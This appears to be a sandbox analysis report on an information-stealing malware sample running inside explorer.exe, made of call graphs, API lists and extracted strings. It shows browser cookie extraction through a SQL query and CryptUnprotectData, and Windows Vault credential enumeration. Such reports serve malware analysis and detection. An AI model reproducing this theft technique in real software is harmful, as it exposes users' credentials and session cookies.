2753f32 lstrcmpiW 28342->28344 28345 2753f78 lstrcmpiW 28342->28345 28388 2751000 GetProcessHeap RtlAllocateHeap 28342->28388 28346 2751011 3 API calls 28343->28346 28347 2753faf FindNextFileW 28344->28347 28348 2753f42 lstrcmpiW 28344->28348 28345->28342 28345->28347 28346->28338 28347->28342 28350 2753fc3 FindClose 28347->28350 28348->28347 28351 2753f56 28348->28351 28350->28343 28405 2751000 GetProcessHeap RtlAllocateHeap 28351->28405 28353 2753f92 PathCombineW 28389 2753e04 28353->28389 28354 2753f60 PathCombineW 28356 2753ed9 23 API calls 28354->28356 28357 2753f76 28356->28357 28358 2751011 3 API calls 28357->28358 28358->28347 28360 2751eb4 28359->28360 28361 2751d62 28359->28361 28360->28334 28361->28360 28431 27519b4 28361->28431 28364 2751d79 28367 2751953 6 API calls 28364->28367 28365 2751d8b 28366 2751953 6 API calls 28365->28366 28368 2751d83 28366->28368 28367->28368 28368->28360 28369 2751da3 FindFirstFileW 28368->28369 28370 2751ead 28369->28370 28377 2751dba 28369->28377 28371 2751011 3 API calls 28370->28371 28371->28360 28372 2751dc5 lstrcmpiW 28374 2751ddd lstrcmpiW 28372->28374 28375 2751e8e FindNextFileW 28372->28375 28373 2751953 6 API calls 28373->28377 28374->28375 28381 2751df5 28374->28381 28376 2751ea2 FindClose 28375->28376 28375->28377 28376->28370 28377->28372 28377->28373 28378 275199d 9 API calls 28377->28378 28380 2751e54 lstrcmpiW 28378->28380 28379 27519b4 lstrlenW 28379->28381 28380->28381 28381->28379 28383 2751011 3 API calls 28381->28383 28384 2751953 6 API calls 28381->28384 28385 275199d 9 API calls 28381->28385 28386 2751d4a 12 API calls 28381->28386 28435 2751cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28381->28435 28383->28375 28384->28381 28385->28381 28386->28381 28387->28341 28388->28353 28390 2751b6a 2 API calls 28389->28390 28392 2753e0f 28390->28392 28391 2753ec7 28391->28357 28392->28391 28406 2751c31 CreateFileW 28392->28406 28399 2753ebf 28400 2751011 3 API calls 28399->28400 28400->28391 28401 2753e6c RtlCompareMemory 28402 2753ea8 28401->28402 28403 2753e7e CryptUnprotectData 28401->28403 28404 2751011 3 API calls 28402->28404 28403->28402 28404->28399 28405->28354 28407 2751c53 GetFileSize 28406->28407 28408 2751c98 28406->28408 28409 2751c90 CloseHandle 28407->28409 28410 2751c63 28407->28410 28408->28391 28416 2752fb1 28408->28416 28409->28408 28428 2751000 GetProcessHeap RtlAllocateHeap 28410->28428 28412 2751c6b ReadFile 28413 2751c80 28412->28413 28413->28409 28414 2751011 3 API calls 28413->28414 28415 2751c8e 28414->28415 28415->28409 28417 2752fb8 StrStrIA 28416->28417 28421 2752ff2 28416->28421 28418 2752fcd lstrlen StrStrIA 28417->28418 28417->28421 28419 2752fe7 28418->28419 28418->28421 28429 275190b 6 API calls 28419->28429 28421->28391 28422 275123b lstrlen 28421->28422 28423 2751256 CryptStringToBinaryA 28422->28423 28424 275129b 28422->28424 28423->28424 28425 2751272 28423->28425 28424->28399 28424->28401 28424->28402 28430 2751000 GetProcessHeap RtlAllocateHeap 28425->28430 28427 275127e CryptStringToBinaryA 28427->28424 28428->28412 28429->28421 28430->28427 28432 27519bc 28431->28432 28434 27519d4 28431->28434 28433 27519c3 lstrlenW 28432->28433 28432->28434 28433->28434 28434->28364 28434->28365 28435->28381 29257 276c97b memcpy 29131 2777f67 24 API calls 29260 2785d6f 20 API calls 29261 276a16f 33 API calls 29132 2787762 memset memset memcpy 29133 275ab68 22 API calls 29262 275a558 18 API calls 29263 277e558 22 API calls 29266 277e141 18 API calls 29137 2776340 92 API calls 29138 276f74d 18 API calls 29267 2769534 39 API calls 29140 276ff32 21 API calls 29268 277f130 22 API calls 29141 2760f3e 60 API calls 29142 2767b3d 18 API calls 29269 2759925 18 API calls 29146 278072d 19 API calls 29148 279c322 27 API calls 29272 2760128 36 API calls 29149 275cb2a _allmul _allmul 28621 2752b15 28622 2751953 6 API calls 28621->28622 28623 2752b1f FindFirstFileW 28622->28623 28625 2752c5c 28623->28625 28644 2752b4e 28623->28644 28626 2751011 3 API calls 28625->28626 28628 2752c63 28626->28628 28627 2752b59 lstrcmpiW 28630 2752b71 lstrcmpiW 28627->28630 28631 2752c3d FindNextFileW 28627->28631 28632 2751011 3 API calls 28628->28632 28629 2751953 6 API calls 28629->28644 28630->28631 28630->28644 28633 2752c51 FindClose 28631->28633 28631->28644 28634 2752c6a 28632->28634 28633->28625 28635 275199d 9 API calls 28637 2752bdf StrStrIW 28635->28637 28636 27519b4 lstrlenW 28636->28644 28638 2752c10 StrStrIW 28637->28638 28641 2752bf1 28637->28641 28638->28641 28639 2751011 3 API calls 28639->28631 28640 2751cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28640->28641 28641->28638 28641->28639 28641->28640 28646 275278e 41 API calls 28641->28646 28643 275199d 9 API calls 28643->28644 28644->28627 28644->28629 28644->28635 28644->28636 28644->28643 28645 2751011 3 API calls 28644->28645 28645->28644 28646->28638 28647 2753717 28648 2751b6a 2 API calls 28647->28648 28651 275372e 28648->28651 28649 2753c23 28651->28649 28697 2751000 GetProcessHeap RtlAllocateHeap 28651->28697 28652 275376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28653 275379e 28652->28653 28654 27537a8 28652->28654 28711 275349b 31 API calls 28653->28711 28698 27a4bec 28654->28698 28657 2753c15 DeleteFileW 28658 2751011 3 API calls 28657->28658 28658->28649 28659 27537b3 28659->28657 28660 2753c0c 28659->28660 28709 2751000 GetProcessHeap RtlAllocateHeap 28659->28709 28661 27a3848 76 API calls 28660->28661 28661->28657 28663 27537e3 28664 27702ec 107 API calls 28663->28664 28685 27537ee 28664->28685 28665 2753bcc 28712 276fb92 93 API calls 28665->28712 28667 2753bd9 lstrlen 28668 2753c05 28667->28668 28669 2753be5 28667->28669 28671 2751011 3 API calls 28668->28671 28713 2751798 lstrlen 28669->28713 28671->28660 28672 2753bf3 28714 2751798 lstrlen 28672->28714 28673 2753a37 CryptUnprotectData 28673->28685 28674 2753833 RtlCompareMemory 28674->28673 28674->28685 28675 27702ec 107 API calls 28675->28685 28677 2753bfc 28715 2751798 lstrlen 28677->28715 28679 2753867 RtlZeroMemory 28710 2751000 GetProcessHeap RtlAllocateHeap 28679->28710 28681 2751011 3 API calls 28681->28685 28682 2753b0f lstrlen 28683 2753b21 lstrlen 28682->28683 28682->28685 28683->28685 28684 2751fa7 19 API calls 28684->28685 28685->28665 28685->28673 28685->28674 28685->28675 28685->28679 28685->28681 28685->28682 28685->28684 28686 2753987 lstrlen 28685->28686 28687 2752112 5 API calls 28685->28687 28690 2753ba3 lstrcat 28685->28690 28691 2751000 GetProcessHeap RtlAllocateHeap 28685->28691 28692 2752112 5 API calls 28685->28692 28686->28685 28689 2753999 lstrlen 28686->28689 28688 2753b66 wsprintfA lstrlen 28687->28688 28688->28685 28688->28690 28689->28685 28690->28685 28691->28685 28693 27539de wsprintfA lstrlen 28692->28693 28694 2753a0d 28693->28694 28695 2753a1b lstrcat 28693->28695 28694->28695 28696 2751011 3 API calls 28695->28696 28696->28685 28697->28652 28716 27a307c 28698->28716 28700 27a4c01 28708 27a4c44 28700->28708 28726 276c54d memset 28700->28726 28702 27a4c18 28727 276c871 21 API calls 28702->28727 28704 27a4c2a 28728 276c518 19 API calls 28704->28728 28706 27a4c33 28706->28708 28729 27a486f 89 API calls 28706->28729 28708->28659 28709->28663 28710->28685 28711->28654 28712->28667 28713->28672 28714->28677 28715->28668 28717 27a3095 28716->28717 28725 27a308e 28716->28725 28718 27a30ad 28717->28718 28743 27566ce 17 API calls 28717->28743 28720 27a30ed memset 28718->28720 28718->28725 28721 27a3108 28720->28721 28722 27a3116 28721->28722 28744 275c59d 17 API calls 28721->28744 28722->28725 28730 2756512 28722->28730 28725->28700 28726->28702 28727->28704 28728->28706 28729->28708 28745 275685c 28730->28745 28732 275651d 28732->28725 28733 2756519 28733->28732 28734 275bfec GetSystemInfo 28733->28734 28748 27565bd 28734->28748 28736 275c00e 28737 27565bd 16 API calls 28736->28737 28738 275c01a 28737->28738 28739 27565bd 16 API calls 28738->28739 28740 275c026 28739->28740 28741 27565bd 16 API calls 28740->28741 28742 275c032 28741->28742 28742->28725 28743->28718 28744->28722 28746 27a307c 17 API calls 28745->28746 28747 2756861 28746->28747 28747->28733 28749 27a307c 17 API calls 28748->28749 28750 27565c2 28749->28750 28750->28736 29151 2776b14 memset memcpy _allmul 29273 27684a7 30 API calls 29152 27713ca 105 API calls 28987 275411b 28988 2754045 50 API calls 28987->28988 28989 275412b 28988->28989 28990 2754045 50 API calls 28989->28990 28991 275413b 28990->28991 29278 2766d01 _allmul 29062 2754108 29063 2754045 50 API calls 29062->29063 29064 2754118 29063->29064 29155 2786f06 24 API calls 29065 27b9304 29067 27b9344 29065->29067 29066 27b9584 29066->29066 29067->29066 29068 27b94da LoadLibraryA 29067->29068 29072 27b951f VirtualProtect VirtualProtect 29067->29072 29069 27b94f1 29068->29069 29069->29067 29071 27b9503 GetProcAddress 29069->29071 29071->29069 29073 27b9519 29071->29073 29072->29066 29156 2775f08 113 API calls 29157 27713ca 102 API calls 29280 275d1f7 memset _allmul _allmul 29281 27549f1 13 API calls 29160 2769ff0 32 API calls 28573 27547fa 28580 275479c 28573->28580 28576 275479c 23 API calls 28577 2754813 28576->28577 28578 275479c 23 API calls 28577->28578 28579 275481f 28578->28579 28581 2751afe 10 API calls 28580->28581 28583 27547af 28581->28583 28582 27547f1 28582->28576 28583->28582 28584 275199d 9 API calls 28583->28584 28585 27547bf 28584->28585 28586 27547ea 28585->28586 28588 2751d4a 18 API calls 28585->28588 28587 2751011 3 API calls 28586->28587 28587->28582 28588->28585 29282 27a55eb IsProcessorFeaturePresent 29283 27599e1 strncmp 29286 275c9ea _allmul _alldiv 28754 27563dd 28757 275b87b 28754->28757 28755 27563f4 28758 275b88d memset 28757->28758 28765 275b8e5 28758->28765 28760 275b609 memset 28760->28765 28761 275ba3c 28761->28755 28762 275b965 CreateFileW 28762->28765 28765->28758 28765->28760 28765->28761 28765->28762 28766 275ba14 28765->28766 28767 275ba41 28765->28767 28772 275b64b 18 API calls 28765->28772 28773 275bb9f 18 API calls 28765->28773 28774 275a2aa 17 API calls 28765->28774 28775 275a1c6 18 API calls 28766->28775 28777 27a52ae 28767->28777 28769 275ba32 28776 27a4db2 17 API calls 28769->28776 28772->28765 28773->28765 28774->28765 28775->28769 28776->28761 28778 27a52bb 28777->28778 28779 27a52d1 28778->28779 28781 278ba08 _allmul 28778->28781 28779->28761 28781->28779 28788 27515dd 28789 2751600 28788->28789 28790 27515f3 lstrlen 28788->28790 28799 2751000 GetProcessHeap RtlAllocateHeap 28789->28799 28790->28789 28792 2751608 lstrcat 28793 2751644 28792->28793 28794 275163d lstrcat 28792->28794 28800 2751333 28793->28800 28794->28793 28797 2751011 3 API calls 28798 2751667 28797->28798 28799->28792 28823 2751000 GetProcessHeap RtlAllocateHeap 28800->28823 28802 2751357 28824 275106c lstrlen MultiByteToWideChar 28802->28824 28804 2751366 28825 27512a3 RtlZeroMemory 28804->28825 28807 27513b8 RtlZeroMemory 28811 27513ed 28807->28811 28808 2751011 3 API calls 28809 27515d2 28808->28809 28809->28797 28810 27515b5 28810->28808 28811->28810 28827 2751000 GetProcessHeap RtlAllocateHeap 28811->28827 28813 27514a7 wsprintfW 28815 27514c9 28813->28815 28814 27515a1 28816 2751011 3 API calls 28814->28816 28815->28814 28828 2751000 GetProcessHeap RtlAllocateHeap 28815->28828 28816->28810 28818 2751533 28819 275159a 28818->28819 28829 275104c VirtualAlloc 28818->28829 28821 2751011 3 API calls 28819->28821 28821->28814 28822 275158a RtlMoveMemory 28822->28819 28823->28802 28824->28804 28826 27512c5 28825->28826 28826->28807 28826->28810 28827->28813 28828->28818 28829->28822 28941 27543d9 28948 2754317 _alloca_probe RegOpenKeyW 28941->28948 28944 2754317 25 API calls 28945 27543f5 28944->28945 28946 2754317 25 API calls 28945->28946 28947 2754403 28946->28947 28949 2754343 RegEnumKeyExW 28948->28949 28950 27543cf 28948->28950 28951 27543c4 RegCloseKey 28949->28951 28955 275436d 28949->28955 28950->28944 28951->28950 28952 2751953 6 API calls 28952->28955 28953 275199d 9 API calls 28953->28955 28955->28952 28955->28953 28956 2751011 3 API calls 28955->28956 28959 275418a 16 API calls 28955->28959 28957 275439b RegEnumKeyExW 28956->28957 28957->28955 28958 27543c3 28957->28958 28958->28951 28959->28955 29165 275ebd9 37 API calls 29288 27a3dc8 24 API calls 29169 27873c4 22 API calls 29055 2759fc8 29056 2759fd3 29055->29056 29058 2759fd8 29055->29058 29057 2759ff4 HeapCreate 29057->29056 29059 275a004 29057->29059 29058->29056 29058->29057 29061 2757f70 17 API calls 29059->29061 29061->29056 29170 27713ca 103 API calls 29289 2779dbc 25 API calls 29173 27933b7 27 API calls 29174 2778ba6 7 API calls 29175 27953ad memset memcpy memset memcpy 29292 27611a0 43 API calls 29293 276fd97 19 API calls 29176 27713ca 103 API calls 29178 276cb91 18 API calls 28782 2751b9d 28783 2751bc1 28782->28783 28784 2751ba2 28782->28784 28784->28783 28785 2751ba9 GetFileAttributesW 28784->28785 28786 2751bb5 28785->28786 28830 275639e 28834 275b1e5 28830->28834 28854 275b1e3 28830->28854 28831 27563b2 28835 275b20d 28834->28835 28839 275b214 28834->28839 28890 275aeea 28835->28890 28838 275b233 28841 275b28f 28838->28841 28874 275a7ae 28838->28874 28839->28838 28839->28841 28908 275ae65 28839->28908 28841->28831 28842 275b26d 28914 275a1c6 18 API calls 28842->28914 28843 275b2d6 28887 2756a5a 28843->28887 28849 275b310 CreateFileMappingW 28850 275b37e 28849->28850 28851 275b32b MapViewOfFile 28849->28851 28915 275a1c6 18 API calls 28850->28915 28851->28850 28852 275b2e8 28851->28852 28852->28841 28852->28849 28855 275b1e5 28854->28855 28856 275b214 28855->28856 28858 275aeea 27 API calls 28855->28858 28857 275b233 28856->28857 28859 275ae65 22 API calls 28856->28859 28870 275b28f 28856->28870 28860 275a7ae 18 API calls 28857->28860 28857->28870 28858->28856 28859->28857 28863 275b267 28860->28863 28861 275b26d 28939 275a1c6 18 API calls 28861->28939 28862 275b2d6 28864 2756a5a 17 API calls 28862->28864 28863->28861 28863->28862 28866 275a67c 22 API calls 28863->28866 28863->28870 28865 275b2e8 28864->28865 28869 275b310 CreateFileMappingW 28865->28869 28865->28870 28868 275b2be 28866->28868 28868->28861 28868->28862 28871 275b37e 28869->28871 28872 275b32b MapViewOfFile 28869->28872 28870->28831 28940 275a1c6 18 API calls 28871->28940 28872->28865 28872->28871 28876 275a7c7 28874->28876 28875 275a805 28875->28841 28875->28842 28875->28843 28878 275a67c 28875->28878 28876->28875 28916 275a1c6 18 API calls 28876->28916 28879 275a694 _alldiv _allmul 28878->28879 28880 275a6c1 28878->28880 28879->28880 28917 275a33b SetFilePointer 28880->28917 28883 275a6f0 SetEndOfFile 28884 275a6d4 28883->28884 28886 275a6ee 28883->28886 28884->28886 28921 275a1c6 18 API calls 28884->28921 28886->28842 28886->28843 28888 27a307c 17 API calls 28887->28888 28889 2756a65 28888->28889 28889->28852 28891 2756a81 memset 28890->28891 28892 275af01 28891->28892 28893 2756a81 memset 28892->28893 28900 275af07 28892->28900 28894 275af2a 28893->28894 28894->28900 28923 2757f07 28894->28923 28896 27a52ae _allmul 28898 275afd9 28896->28898 28897 275af54 28897->28896 28897->28900 28899 275b87b 21 API calls 28898->28899 28901 275affa 28899->28901 28900->28839 28902 275b020 28901->28902 28903 275b000 28901->28903 28904 275ae65 22 API calls 28902->28904 28931 275a1c6 18 API calls 28903->28931 28906 275b01c 28904->28906 28906->28900 28926 275adcc 28906->28926 28909 275ae7a 28908->28909 28910 275ae83 28909->28910 28911 275a67c 22 API calls 28909->28911 28910->28838 28912 275aea5 28911->28912 28912->28910 28938 275a1c6 18 API calls 28912->28938 28914->28841 28915->28841 28916->28875 28918 275a390 28917->28918 28919 275a36a 28917->28919 28918->28883 28918->28884 28919->28918 28922 275a1c6 18 API calls 28919->28922 28921->28886 28922->28918 28932 2757ec7 28923->28932 28929 275ade4 28926->28929 28927 275ae5f 28927->28900 28929->28927 28930 275bafc 20 API calls 28929->28930 28937 275a39e 18 API calls 28929->28937 28930->28929 28931->28906 28933 2757ed9 28932->28933 28935 2757ed4 28932->28935 28936 2756e6a 17 API calls 28933->28936 28935->28897 28936->28935 28937->28929 28938->28910 28939->28870 28940->28870 29295 2751198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 29179 275bf9a _alldiv 29296 2777d8b _allrem memcpy 29183 276ab8b 19 API calls

                                                                                                                                        Executed Functions

                                                                                                                                        Function 02753717 Relevance: 45.9, APIs: 19, Strings: 7, Instructions: 401stringfileencryptionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 2753717-2753730 call 2751b6a 3 2753c37-2753c3d 0->3 4 2753736-275374c 0->4 5 2753762-275379c call 2751000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 4->5 6 275374e-275375e call 275302d 4->6 11 275379e-27537a3 call 275349b 5->11 12 27537a8-27537b5 call 27a4bec 5->12 6->5 11->12 16 2753c15-2753c1e DeleteFileW call 2751011 12->16 17 27537bb-27537d3 call 278eeb8 12->17 21 2753c23-2753c28 16->21 22 2753c0c-2753c10 call 27a3848 17->22 23 27537d9-27537f1 call 2751000 call 27702ec 17->23 21->3 24 2753c2a-2753c32 call 2752ffa 21->24 22->16 31 27537f7 23->31 32 2753bd0-2753be3 call 276fb92 lstrlen 23->32 24->3 33 27537fc-2753816 call 2751fa7 31->33 37 2753c05-2753c07 call 2751011 32->37 38 2753be5-2753c00 call 2751798 * 3 32->38 41 2753bb6-2753bc6 call 27702ec 33->41 42 275381c-275382d 33->42 37->22 38->37 41->33 55 2753bcc 41->55 45 2753a37-2753a51 CryptUnprotectData 42->45 46 2753833-2753843 RtlCompareMemory 42->46 45->41 48 2753a57-2753a5c 45->48 46->45 50 2753849-275384b 46->50 48->41 52 2753a62-2753a78 call 2751fa7 48->52 50->45 54 2753851-2753856 50->54 61 2753a86-2753a9d call 2751fa7 52->61 62 2753a7a-2753a80 52->62 54->45 58 275385c-2753861 54->58 55->32 58->45 60 2753867-27538ed RtlZeroMemory call 2751000 58->60 73 27538f3-2753909 call 2751fa7 60->73 74 2753a2e-2753a32 60->74 68 2753a9f-2753aa5 61->68 69 2753aab-2753ac2 call 2751fa7 61->69 62->61 64 2753a82 62->64 64->61 68->69 71 2753aa7 68->71 78 2753ac4-2753aca 69->78 79 2753ad0-2753aed call 2751fa7 69->79 71->69 83 2753917-275392d call 2751fa7 73->83 84 275390b-2753911 73->84 77 2753bb1 call 2751011 74->77 77->41 78->79 82 2753acc 78->82 90 2753af7-2753b01 79->90 91 2753aef-2753af1 79->91 82->79 92 275392f-2753935 83->92 93 275393b-2753952 call 2751fa7 83->93 84->83 86 2753913 84->86 86->83 95 2753b03-2753b05 90->95 96 2753b0f-2753b1b lstrlen 90->96 91->90 94 2753af3 91->94 92->93 97 2753937 92->97 103 2753954-275395a 93->103 104 2753960-2753979 call 2751fa7 93->104 94->90 95->96 99 2753b07-2753b0b 95->99 96->41 100 2753b21-2753b2a lstrlen 96->100 97->93 99->96 100->41 102 2753b30-2753b4f call 2751000 100->102 110 2753b51 102->110 111 2753b59-2753b93 call 2752112 wsprintfA lstrlen 102->111 103->104 106 275395c 103->106 112 2753987-2753993 lstrlen 104->112 113 275397b-2753981 104->113 106->104 110->111 118 2753b95-2753ba1 call 275102f 111->118 119 2753ba3-2753baf lstrcat 111->119 112->74 117 2753999-27539a2 lstrlen 112->117 113->112 115 2753983 113->115 115->112 117->74 120 27539a8-27539c7 call 2751000 117->120 118->119 119->77 125 27539d1-27539d9 call 2752112 120->125 126 27539c9 120->126 128 27539de-2753a0b wsprintfA lstrlen 125->128 126->125 129 2753a0d-2753a19 call 275102f 128->129 130 2753a1b-2753a29 lstrcat call 2751011 128->130 129->130 130->74
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02751B6A: CreateFileW.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,02752893,00000000,00000000,00000000,?), ref: 02751B82
                                                                                                                                          • Part of subcall function 02751B6A: CloseHandle.KERNEL32(00000000), ref: 02751B8F
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 02753778
                                                                                                                                        • GetTempFileNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02753782
                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 02753789
                                                                                                                                        • CopyFileW.KERNEL32(?,00000000,00000000), ref: 02753794
                                                                                                                                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 0275383B
                                                                                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 02753870
                                                                                                                                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 0275398B
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0275399A
                                                                                                                                        • wsprintfA.USER32 ref: 027539F1
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 027539FD
                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 02753A21
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02753A49
                                                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02753B13
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 02753B22
                                                                                                                                        • wsprintfA.USER32 ref: 02753B79
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 02753B85
                                                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 02753BA9
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 02753BDA
                                                                                                                                        • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 02753C16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                                                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                                                        • API String ID: 584740257-404540950
                                                                                                                                        • Opcode ID: 690a921388d7a2daf90bc0710df98d5f811de8da34d2b74a56705e1cfd330789
                                                                                                                                        • Instruction ID: fa94ac2788205ba3fd72da0bbc087a9d5905fd9a8994ded8502302c6e7aec76e
                                                                                                                                        • Opcode Fuzzy Hash: 690a921388d7a2daf90bc0710df98d5f811de8da34d2b74a56705e1cfd330789
                                                                                                                                        • Instruction Fuzzy Hash: BFE19D716083519FDB12DF24C854B2FBBEAAFC5798F04896CF885962A0DBB5C805CB52
                                                                                                                                        Function 02752198 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 242libraryloaderCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 134 2752198-27521c9 RtlZeroMemory GetVersionExW 135 27521d7-27521dc 134->135 136 27521cb-27521d0 134->136 138 27521de 135->138 139 27521e3-27521f6 LoadLibraryW 135->139 137 27521d2 136->137 136->138 137->135 138->139 140 27521fc-275223e GetProcAddress * 5 139->140 141 275249b-27524a3 139->141 142 2752244-275224a 140->142 143 2752492-275249a FreeLibrary 140->143 142->143 144 2752250-2752252 142->144 143->141 144->143 145 2752258-275225a 144->145 145->143 146 2752260-2752265 145->146 146->143 147 275226b-2752277 146->147 148 275227e-2752280 147->148 148->143 149 2752286-27522a5 148->149 151 275248b-275248f 149->151 152 27522ab-27522b3 149->152 151->143 153 2752483 152->153 154 27522b9-27522c5 152->154 153->151 155 27522c9-27522db 154->155 156 2752365-2752375 RtlCompareMemory 155->156 157 27522e1-27522f1 RtlCompareMemory 155->157 158 2752452-2752475 156->158 159 275237b-27523c9 call 2751953 * 3 156->159 157->158 160 27522f7-2752348 call 2751953 * 3 157->160 158->155 163 275247b-275247f 158->163 176 27523e4-27523ea 159->176 178 27523cb-27523dc call 2751953 159->178 160->176 177 275234e-2752363 call 2751953 160->177 163->153 181 2752431-2752433 176->181 182 27523ec-27523ee 176->182 190 27523e0 177->190 178->190 184 2752435-2752437 call 2751011 181->184 185 275243c-275243e 181->185 187 27523f0-27523f2 182->187 188 275242a-275242c call 2751011 182->188 184->185 192 2752447-2752449 185->192 193 2752440-2752442 call 2751011 185->193 187->188 194 27523f4-27523f6 187->194 188->181 190->176 192->158 197 275244b-275244d call 2751011 192->197 193->192 194->188 196 27523f8-2752406 StrStrIW 194->196 198 2752426 196->198 199 2752408-2752421 call 27517c0 * 3 196->199 197->158 198->188 199->198
                                                                                                                                        APIs
                                                                                                                                        • RtlZeroMemory.NTDLL(?,00000114), ref: 027521AF
                                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 027521BE
                                                                                                                                        • LoadLibraryW.KERNEL32(vaultcli.dll), ref: 027521E8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 0275220A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 02752214
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 02752220
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0275222A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 02752236
                                                                                                                                        • RtlCompareMemory.NTDLL(?,027B1110,00000010), ref: 027522E8
                                                                                                                                        • RtlCompareMemory.NTDLL(?,027B1110,00000010), ref: 0275236C
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,02752F0C), ref: 02751973
                                                                                                                                          • Part of subcall function 02751953: lstrlenW.KERNEL32(027A6564,?,?,02752F0C), ref: 02751978
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,?,?,?,02752F0C), ref: 02751990
                                                                                                                                          • Part of subcall function 02751953: lstrcatW.KERNEL32(00000000,027A6564,?,?,02752F0C), ref: 02751994
                                                                                                                                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 027523FE
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 02752493
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000D.00000002.2747671125.0000000002751000.00000040.80000000.00040000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_13_2_2751000_explorer.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                                                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                        • API String ID: 2583887280-2831467701
                                                                                                                                        • Opcode ID: c011b48656fd0515c17a5560e7a5011165e443d2da37c84e39ef1fbe6bc7f475
                                                                                                                                        • Instruction ID: 66c4944bf8a0b77f340c393dc4d3486add4e70a026df807341689fbad7a1f3c1
                                                                                                                                        • Opcode Fuzzy Hash: c011b48656fd0515c17a5560e7a5011165e443d2da37c84e39ef1fbe6bc7f475
                                                                                                                                        • Instruction Fuzzy Hash: AF918B71A083519FDB18DF65C894A2BFBEAAFC8704F44482DFD8997251EBB0D801CB52
                                                                                                                                        Function 02753098 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 248fileencryptionCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 261 2753098-27530b1 call 2751b6a 264 27530b7-27530cd 261->264 265 27533ba-27533c0 261->265 266 27530e3-2753128 call 2751000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 27a4bec 264->266 267 27530cf-27530d8 call 275302d 264->267 274 275312e-2753146 call 278eeb8 266->274 275 275339b-27533a4 DeleteFileW call 2751011 266->275 270 27530dd-27530df 267->270 270->266 280 2753392-2753396 call 27a3848 274->280 281 275314c-2753158 call 27702ec 274->281 279 27533a9-27533ab 275->279 279->265 282 27533ad-27533b5 call 2752ffa 279->282 280->275 287 275315e-2753161 281->287 288 2753389-275338d call 276fb92 281->288 282->265 290 2753165-275317f call 2751fa7 287->290 288->280 293 2753185-2753196 290->293 294 275336f-275337b call 27702ec 290->294 295 27532cd-27532e7 CryptUnprotectData 293->295 296 275319c-27531ac RtlCompareMemory 293->296 294->290 303 2753381-2753385 294->303 295->294 298 27532ed-27532f2 295->298 296->295 299 27531b2-27531b4 296->299 298->294 301 27532f4-275330a call 2751fa7 298->301 299->295 302 27531ba-27531bf 299->302 308 275330c-2753312 301->308 309 2753318-275332f call 2751fa7 301->309 302->295 305 27531c5-27531ca 302->305 303->288 305->295 307 27531d0-2753253 RtlZeroMemory call 2751000 305->307 319 2753255-275326b call 2751fa7 307->319 320 27532bd 307->320 308->309 311 2753314 308->311 315 2753331-2753337 309->315 316 275333d-2753343 309->316 311->309 